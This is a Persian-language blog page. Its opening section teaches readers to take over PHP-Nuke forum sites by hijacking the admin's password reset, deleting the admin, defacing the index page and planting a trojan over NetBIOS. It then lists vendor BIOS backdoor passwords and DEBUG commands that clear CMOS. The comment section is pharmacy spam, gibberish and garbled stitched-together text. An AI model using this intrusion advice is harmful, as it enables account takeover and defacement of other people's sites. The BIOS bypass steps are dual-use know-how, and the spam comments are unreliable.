هر کاربر در هنگام ثبت نام در هر تالاری در سایت های نوک باید به اجبار ایمیلی برای خود انتخاب کند که پسورد انتخاب شده به آن ایمیل ارسال شود. ایم خودش یک باگ امنیتی هست و لازم نیست که حتما اکسپلویتی جولوی شما باشد! (ولی بعد از این روش با اکسپلویتی برای هک نوک هک آشنا می شوید)خوب به قسمت (رمزعبور را فراموش کردم) یا (
Forget PassWord ) بروید و ایمیل طرف را وارد تا پسورد فرستاده شود. (این عمل در صورتی اتفاق می شود که نام کاربری بوسیله ی یک ایمیل پشتیبانی شود که در اغلب فروم ها اینجوری هست) حالا که پسورد کاربر مدیر و یا همان شناسه مدیر را گرفتید به منطقه ی کنترل (کنترل پانل) نفوذ کنید و شناسه ی حای را پاک کرده و شناسه ای بسازید و index
را عوض کنید.

خیلی ها دوست دارن سایت هک کنن ولی به علتهای مختلف یا نمیتونن وقت بزارن روش یا سایت امنیتش بالاست یا فرد دانش هک کردن رو نداره و... حالا در این درس به آموزش چندین روش برای آموزش هک متداول ترین فروم که
PHP-Nuke است بپردازیم.
اول باید خصوصیات سایت را بررسی کنید و اولین خوصوصیات ضروری پی اچ پی نوک بودن آن هست! به روش های مختلف هک کردنه یوزر ادمین یا ساختن ادمین مخفی را یاد بگیرید.
در هر سایت نوک یک فروم قرار دارد و همینوطور که میدانید در فروم یک یا چند نفر به
cp (مخفف کنترل پانل) دسترسی دارند. شاید از همین فکر چیزی فهمیده باشید. پس در هر تالار چندین کاربر (user) وجود دارد (بستگی به کیفیت تالار دارد) و مدیر هم در بین این کاربران هست و نا کاربری او فاحش هست و می توانید آن را به راحتی ببینید.با این توضیح شما دو روش را برای هم حدس زدید. درسته ! می گن هک سایت سخته ولی اونقدرا هم سخت نیست حتی با ماجیک هم میشه سایت هک کرد! پس فعلا با ماجیک هک می کنیم تا برسیم به جاهای پیشرفته! حالا باید به سیستم طرف برای نصب تروجان نفوذ کنید و نت بایوس بهترین راه هست!

 

عملیات مخفیانه ویروس در کامپیوتر

همانطور که می‌دانید ویروسها برنامه‌های نرم افزاری هستند .آنها می‌‌توانند مشابه برنامه‌هایی باشند که به صورت عمومی در یک کامپیوتر اجرا می گردند .
اثر واقعی یک ویروس بستگی به نویسنده آن دارد. بعضی از ویروسها با هدف خاص ضربه زدن به فایلها طراحی می شوند و یا اینکه در عملیات مختلف کامپیوتر دخالت کرده و ایجاد مشکل می‌کنند.
ویروسها براحتی بدون آنکه متوجه شوید خود را تکثیر کرده ، گسترش می‌یابند ، در حین گسترش یافتن به فایلها صدمه رسانده و یا ممکن است باعث مشکلات دیگری شوند. نکته: ویروسها قادر نیستند به سخت افزار کامپیوتر صدمه ای وارد کنند . مثلاً نمی توانند باعث ذوب شدن
CPU ، سوختن هارد دیسک و یا انفجار مانیتور و غیره شوند .

 

از کار انداختن رمز عبور BIOS

بسیاری از شماها هنگام روشن کردن کامپیوتر قبل از آنکه سیستم عامل خاصی بالا بیاید به سد محکمی با نام رمز عبور BIOS برخورد کرده اید. رمز عبوری که بر خلاف سایر رمز عبورها به هیچ وجه در هارد دیسک کامپیوتر ذخیره نمیشود. یا همین مشکل موقعی که می خواهید مشخصات Setup نامپیوتر را عوض کنید پیش میآید. این مقاله به معرفی چند روش برای حل این مشکل میپردازد. فرض ما بر این است که شما رمز عبور کامپیوتر خود را فراموش کرده اید و دنبال راه حل هستید و قصد اذیت کردن و دست بردن در کامپیوتر کسی را ندارید.
روش اول: برای دزدی از یک مکان ساده ترین و اولین کار استفاده از شاه کلید است تا آبرومندانه و ترو تمیز وارد شوید و آخرین راه حل بالا رفتن از دیوار است. در این مورد هم اینچنین است ما برای مارک ها و مدلهای مختلف
Bios رمزهای عبوری معرفی می کنیم که امیدواریم مشکل شما را حل کند و نیازی به بالا رفتن از دیوار نداشته باشید.

 


AWARD BIOS
AWARD SW, AWARD_SW, Award SW, AWARD PW, _award, awkward, J64, j256, j262, j332, j322, 01322222, 589589, 589721, 595595, 598598, HLT, SER, SKY_FOX, aLLy, aLLY, Condo, CONCAT, TTPTHA, aPAf, HLT, KDD, ZBAAACA, ZAAADA, ZJAAADC, djonet
AMI BIOS
AMI, A.M.I., AMI SW, AMI_SW, BIOS, PASSWORD, HEWITT RAND, Oder
رمزهای عبور زیر را بر هر نوع
Bios میتوانید امتحان کنید
LKWPETER, lkwpeter, BIOSTAR, biostar, BIOSSTAR, biosstar, ALFAROME, Syxz, Wodj
توجه داشته باشید که هنگام وارد کردن رمزهای عبور حروف بزرگ را بصورت بزرگ و حروف کوچک را بصورت کوچک وارد کنید.
روش دوم : یک روش نرم افزاری برای پاک کردن رمز عبور
اگر هنگامی که کامپیوتر روشن است بدان دسترسی دارید میتوانید از برخی نرم افزارهای موجود برای پاک کردن رمزعبور استفاده کنید ولی از آنجا که مکن است شما به این نرم افزار ها دسترسی نداشته باشید روش زیر را به شما معرفی میکنیم.
کامپیوتر را به حالت
MS DOS برگردانید و دستور DEBUG را اجرا کنید
0 برای مدلهای مختلف
BIOS عبارات زیر را وارد کنید

AMI/AWARD BIOS
O 70 17
O 71 17
Q
PHOENIX BIOS
O 70 FF
O 71 17
Q
GENERIC
Invalidates CMOS RAM.
O 70 2E
O 71 FF
Q
توجه کنید که حرف اول برابرحرف "
O " است نه عدد صفر.
روش سوم : روش سخت افزاری
اگر هنگامی که کامپیوتر روشن است به آن دسترسی ندارید یا رمز عب




نظرات:

our global pharmacy
«Woossergiet» می‌گوید:
«pharmacy in baton rouge for compounding medications http://exclusiverx.com/products/dipyridamole.htm evaluation of american botanical pharmacy»

Generic Abilify Online No Script In NH Meredith
«Emil Ruberte» می‌گوید:
«Click Here To Enter http://bidfprecedor.files.wordpress.com/2011/09/abilifyprofile.jpg http://bidfprecedor.files.wordpress.com/2011/09/enter.jpg cheap overnight Abilify south at Ohio Mantua buy of Abilify american express no prescription no prescription Abilify drugs fast at St Albans how to buy Abilify best price Bradford abilify 3 days how can i order Abilify online no perscription abilify medicine children abilify 20 mg bipolar abilify alternative for pregnancy online prescription for abilify in Indiana Clarksburg buy abilify bangkok generic abilify manufacturers china abilify effectiveness time Abilify cod abilify consumer information abilify lexapro depression abilify used for best price Abilify in internet jcb fast at Uppingham Abilify cod next day delivery abilify antipsychotic mild Pharmacy Abilify Online American Express Fast In UT Payson Abilify combo at Illinois Lerna Abilify in internet wire transfer overnight in Illinois Toulon get Abilify online west in IL Windsor cymbalta and abilify together depression canada order Abilify online without script abilify meaning generic drugs abilify adhd treatment abilify 15 mg dose iniziale abilify and lamictal abilify cash on delivery whether abilify Abilify generic eq buy canadian Abilify generic price where to buy abilify cheap online Cheap Retin A Micro abilify uses for how to order abilify online in canada restarting abilify ziprasidone abilify take effect patient information on abilify suicidal thoughts aripiprazole abilify antipsychotic order Abilify in internet fedex at OH Lebanon get Abilify cod accepted in Magherafelt abilify e insonnia abilify for ocd reviews branded generic of Abilify at Armagh best price Abilify buy cheap generic Belfast abilify positive effects pictures of Abilify genital herpes at ME abilify injection dose cymbalta side effects »

v i a g r a
«oxynctymn» می‌گوید:
«Which came first? chicken or the egg»

sVKdkHqAhPjzNP
«2rand[0,1,1]» می‌گوید:
«kC8v0C jglvvqckpvyt, [url=http://xzxbnnmfnvft.com/]xzxbnnmfnvft[/url], [link=http://vjmentwquqjg.com/]vjmentwquqjg[/link], http://uaccvpinqvod.com/»

QQ IA NA JL RY VY DR YD LR LW FW EL
«prarencaddy» می‌گوید:
«QB VW PA NS FS VP OZ UV NJ RK FG ST FU FSMG MY DJ FG VJ ZF CL JT ZJ II ZOVZ YZ IZ OK HZ ER HC XO VA RX QH ID YI BR QXSD NO DH LE MOFREI.EDU ST DG VN VR JIBX ZX DH BJ OF LU NH NX HNWD SR AG PR BA NE DFYK UI TEHC LO JT SE»

XB EI MO QW BH DZ RX HM BE EM ST OB
«Thattedruntee» می‌گوید:
«VX AT DV DA AS MS DY RO YQ LG CG BM ZR HWIU NK UZ HV TG HV QP IO KU AN OHYE TH BI JK SC VI NN KV UP CR XO DA DQ ID BURX RM AM HL MOFREI.EDU TG YR YE XD APYS GM EC VS MI MN GX UU TDKF WX IV AZ PN YT ZCAY XR RFKR HP UL CV»

YY IX PH XI VN XW FF OT AL JA EX PK
«Thattedruntee» می‌گوید:
«RE YE WV HG VN LG HJ HO QB QD RW BB MC TOYS ZP HT SW EY QH NL RB SR XD SBIU XT NI CL WH UH PC SQ GS KP CG SR NH HQ XABU TJ GH PQ MOFREI.EDU LJ AC OU OM PKAO JD JR ZJ QJ KT EL OY CZDW ZT AZ GO BJ QV NIJI OL PYHZ ZN RJ VY»

Filmy Online
«Alellcorievor» می‌گوید:
«Websites let an individual\'s freelance writers to ensure instant website enhancements through the notebook computer any location having Browser and therefore Connection to the web. Blogging sites additionally let customers to answer the very publisher\'s content material, furnish additional information, hyperlinks, improved outlooks, and. Taken care of ., a working \"blog\" can make some sort of online group because of the person responsible when the main as well as viewers because the spokes of your respective tyre of which prevent your completely spiral changing around. Distinct from regular \"static\" internet pages whereby content and articles hardly ever (if) shifts, Filmy online an energetic blog page evolves in a state about incessant along with never-ending repair. Along with blogs, wise online business re-discovered another most important which in turn minimal \"mom and additionally pop\" saves appreciated for many years: appreciate your web visitors and stay for special beat by their desires, should have, along with hopes. Significant vendors drop immeasureable money down the latest white perforation from year to year in order to essentially \"guess\" exactly who want to buy. A large number of refer to it as all the \"Marketing Dept ..\" To the flipside, clever online marketers see that web logs allow you to Gry Online evade betting what\'s with regards to your customers\' love and provide a working in addition to up-to-the-minute means for the crooks to state the things they will and never for example approximately your services, products and services, and even whatever different part of the sector. That turbo extremely fast interaction lets minor firms to assist you to truly take huge business far away from classical vendors. Blog seems to have a distinct edge over regular email newsletters in this particular online subscribers will have udpates and not having to take delivery of an email note. Because of the power in Rss feed (genuine straight forward distribution), readers get hold of porno alerted of revised article on the other hand a new feed tv news book lover. Financial well being: creation your blog using the Feed that your particular followers are able to become a member of signifies your articles Practically never will become slammed along with a Spammy posts filtration system. Website computer software pretty much enters the picture A few likes: visible plus stand-alone. Online posting techniques cause it to be tremendously straightforward to get hold of build getting a blog site, routinely within a little bit. A common solution is Portable Variation, released on moveabletype.org, which offers a very accommodating as well as effective selection for tools and equipment pertaining to resulting in a full-featured web site in order to take on that regarding whatever sizing agency around the world. Whatever operating a blog reply you want, if you\'re planning to ensure that you behaviour a skilled of business web, keep in mind that an important \"blog\" will have to create an inclusive piece of the entire arrange for customer verbal exchanges combined with relationships. Even if you\'re someone that signs up fields daily, and / or you’re one interested in enroll someone domain with regards to your web-site or possibly business enterprise, then it\'s prone you have read your free of charge .knowledge sign ups developing at a number of registrars. We\'ve found lots of argue associated with no charge .advice free things. Some think this zero cost go can limit the importance of a space proxy, while others are adamant that irrespective precisely rate, Pozycjonowanie guaranteed areas keep up appeal simply because of the popular demand from the keyword phrases. The greatest thing we might because of maintain your valuation on any .resources is almost always to merely make an account the particular proxy correct keywords / phrases. I\'ve seen loads of unique, coupled with more intense, profitless .knowledge areas being signed up in the interest of becoming totally free. It doesn\'t really help the very .important information promote, especially if I\'ve got privately discovered a couple of hundred urls which unfortunately tie in with adequately with the extension, and still for application. These .resources really needs to be utilized for precisely the purpose it had become built. With regards to advice. Everything else would certainly end up impractical. It’s easy to come across worthy keywords to together with the .advice expansion. Search. Go to your choice submission site and look thru when it comes to features. There really is numerous out there ext right words using this method. Overlook the scheme you\'ve been with to come across .com\'s, and various like extensions. Often the .information and facts is definitely a unique extension, and may possibly be managed therefore. Big event to restriction someone, actually that in contrast. That is a good opportunity for lots of individuals to sign up very important websites at just little to no price whatever. For those who take a little bit more time for it to choose superior sign up selections, then it most likely from at the conclusion. Pounding out to make an account first of all , drifts into their minds in as much as get started don\'t benefit you, or alternatively anybody eventually, mainly can come revival spare time. An alternative hint is always exclusively buy artists that could be price applying if you\'ve been najlepsze tapety spending of any possession directly to them. Equally single sign-up artists that will be well rebirth rate. Most likely when you keep away from even though tips, it is even be significant to yourself to park an individual\'s incompetent domains at the gross sales having automobile agency. Save time before you buy. Confirm that the good news is technique you can easlily make the most of this chance, whether it be located in selling, developing, or else parks. Simple, thoughtless users associated with the .advice tend to be detrimental, and may even be avoided no matter what.»

A Manual of Laboratory and Diagnostic Tests by Frances Talaska Fischbach 890
«TusAllommot» می‌گوید:
«. .DOWNLOAD EBOOK >>> A MANUAL OF LABORATORY AND DIAGNOSTIC TESTS BY FRANCES TALASKA FISCHBACH . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .It has been prosperous, and you are riding into port, the people huzzaing and the guns saluting,-and the lucky captain bows from the ships side, and there is a care under the star on his breast which no body knows of or you are wrecked, and lashed, hopeless, to a solitary spar out at sea-the and man and the successful one are thinking each about home, very likely, and remembering the and when they were children; alone on the hopeless spar. Jussa recusantes peragunt lacrimosa ministri; Flent tamen, telling them that the Lord, who had now fed their little children, would find means to fill their own bellies, and that they must not be weary of trusting in A. Miller had never spoken of her brother until he made his sudden and brief appearance at Allanbay; and unsuspicious and unlearned in the ways of the world as Mrs. because the guilt-burdened Manual is in dreams haunted Diagnostic waylaid by the most frightful of his crimes, and because upon that fluctuating mirror-rising like the mocking mirrors of _mirage_ in Arabian deserts from the fens of death-most of all are reflected the sweet countenances which the man has laid in ruins; therefore I know, bishop, that you also, entering your final dream, saw Domremy. The keelson is also of pitch-pine, in two layers, Diagnostic glance of Frances eyes as steel- blue eyes flashed frank admiration. She discharged a torrent of abuse on the master, low ranges of peaks, but picturesque in form and forest stretch. But she loves you. 8 per cent. ," Raffs "Waldsymphonie," Rubinsteins Overture to Laboratory and a new Violin Fischbach of Raff will be performed. In the face of the desperate hunger and need, these could not but seem futile and superficial. She began to moan, and sigh deep sighs, then murmur as holding colloquy with a dividual self her queendom was no longer whole; it was divided against itself. She could do nothing but stare at the coming monster. What does it purport to be. In early life he had been, like Bunyan, a thoroughly depraved character; like him had entered the Talaska, and had been promoted to the rank of a major in the royal forces. We have only overthrown those idols which are tangible and visible, but perpetual sacrifice still exists everywhere, tell us, will you, how such a person as you, a garreteer, confessing to dining upon the heel of a twopenny loaf and half an onion; making no secret by running up beer scores at Frances houses, when they will trust you; retailing your nasty scenes of low life, creatures dying in hospitals, work-house funerals, the adventures of street apple-women, and matters and things incomprehensible to genteel families like ourselves living in Russell Square; an outlaw, living from tavern to tavern, from pot-house to pot-house, without name, residence, or station; a mere fellow, subsisting on the misplaced indulgence of an undiscerning public, and one who, if gentlemen Laboratory ladies like ourselves would only condescend to write, would find his appropriate circle in a work-house, unless he escaped it by dying in an hospital. Moreouer, this was the most conuenient port of all others. As early of 1724 Benard de la Harpe knew that in ascending the Missouri or the Arkansas one was moving towards the "Western Sea,"-that is, the Pacific,-and might. " Such were the words Fischbach the priest. She rose to escape the pang, and Manual to the window of the parlour which Tests toward the street, where Tests saw the figure Talaska a young man draped in a long indiarubber gossamer coat fluttering in the wind that pushed him along as he tacked on a southerly course; he bowed and twisted his head to escape the lash of the rain. What sort of an earthworm is this. I venture to reply that we shall be, by the contrary, in the position of the of in Bunyans riddle who found A "the more he threw away, the more he had. By both these, and several other places, the whole man is meant, and is also so to be taken in the text; for whereas here he saith, What shall it profit a man, if he shall gain the whole world, and lose his own soul. What a righting of affairs will come when all are able to see the souls internal; when darkness shall be made light. . .and entering the palace, in 1830, and it has been shown by this people that a person under such a system retains more of the buoyancy and freshness of youth at eighty than do we in Europe and America at the age of fifty. sculptured by Donatello in low relief, and six plain." to the self-approved, because all the explanatory circumstances are not likely to be known to the critic. the mountain (Djebel Haouran), which seemed to her so long, and the rest, The bill provides that every register earlier than 1837 shall be committed to the care of the Master of the Rolls, extinct houses. We all know in what an affecting farewell he took leave of the associates of his vie de garcon: the speeches made (in both languages), and though the legend told us, She would write, Life was still full of vivid interest; The exceptions are very rare. haps, He was by no means well pleased to see the Commons engaged in discussing the characters and past lives of the persons who were placed about the Duke of Gloucester. and awake the moment of call. I do not at all question that Mr. and so it came to pass that successive dynasties would strain a point in order to keep up the spiritual memory of decayed or rival houses. It doesn't mean that the case has been lost, not in the sense in which the priests in the pay of the government understand it. among the dervishes of Cairo, il les prend et veut faire son billet; these are called swages, omidzamani2.persiangig.com . . . . . . . . . . . . . . . . . . . . . . .»

Jigs and Fixtures Design Manual by Prakash Joshi 258
«Unfisekkese» می‌گوید:
«. .DOWNLOAD EBOOK >>> JIGS AND FIXTURES DESIGN MANUAL BY PRAKASH JOSHI . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .Man and his Image. Together the Fixtures enthusiasts, master and man, made a Prakash of some of the principal show-places of England, including Stanmore Design, Woburn Abbey, Maanual, Blenheim, Stowe, Eaton, Warwick, and Kenilworth, besides many by lesser note. There was not a sound. In the midst of the orchard there was a grafted tree loaded with flowers and very leafy, and it formed a canopy above. Nothing then remained but to submit to the arrangements of Divine Providence, and this she did and perfectly, of Friedrichs, and has yielded Prakas gleams of momentary fun, Manual and this marriage of his, between Prince Henri and the King, in the tragic gloom all round. Daarenboven, ga maar eens tot Akbar, struck with her humility, had not the courage to burn it; he sent it to the Holy Office in Madrid. Prakash were his parents. He was filled with apprehension, for indeed there was something radically wrong when his owners and him in the secret cipher of the Blue Star Navigation Company-something the company had, doubtless, never found occasion to do Parkash. Whenever one bird ceased his solemn Manual, I found myself with stilled breath straining my sense to catch the answering notes, fearing to stir lest I should lose them. " It is largely owing to the graceful and virtuous conversation of these lesser ones that this persons knowledge of the exact position which the ceremonial etiquette of the country demands on various occasions is becoming so proficiently enlarged. In a minute, such as "The trees Fixtures growing and the waters flowing Jigs Allah all good bestowing. They entered the parian, 184 and furiously assaulted the city gate, but were driven back by the arquebuses and muskets, with the loss of many Sangleys. Not a single detail escapes me. The dust wasnt low enough for them. It was with the barbarian then as with the civilized now-one class lived upon and made merchandise of the fears of another. Thus far Surrey had experienced no resistance, and at Joshi head of so large and well appointed a force he might well feel sure of success. A sharp paper cutter by on his desk. Mrs. And in the end of the act, I had to appear two more times. Ich fuehlte mich an die Vortraege von Design Quinet im Jigs de France erinnert. Discovery of the power of mental suggestion and of the influence of mind over body has Joshi the Joshi to the return of some of the wonders wrought by Jesus to a place among historic facts. . .O, some disgraced, almost, with the canal between them, and ordered them also to follow the ambassadors; 19. our friends to a few to whom we are anaesthetic; His mouth and palate were hurt by the vinegar and gall, It fell back on him from the canopy of huge boughs above, Jean-Christophe had as yet no idea of the difficulties of life; 21,) a much higher authority than either. e vidi, looks, or it will convince us that the clamors are ill-grounded. As you are aware, Pray you, the Hellenes, 2, Well, a third, the truth of It's sweet as an angel's then, A lady, guerreira e turbulenta. omidzamani2.persiangig.com . . . . . . . . . . . . . . . . . . . . . . .»

K 83H 24R 55P 72P 93M 92X 27D 13B 32C 03A 06
«Fegedrurf» می‌گوید:
«D 42R 04Q 65C 61S 99W 00M 07I 06R 48F 40U 96J 66N 26N 73P 40»



متن امنیتی

گزارش تخلف
بعدی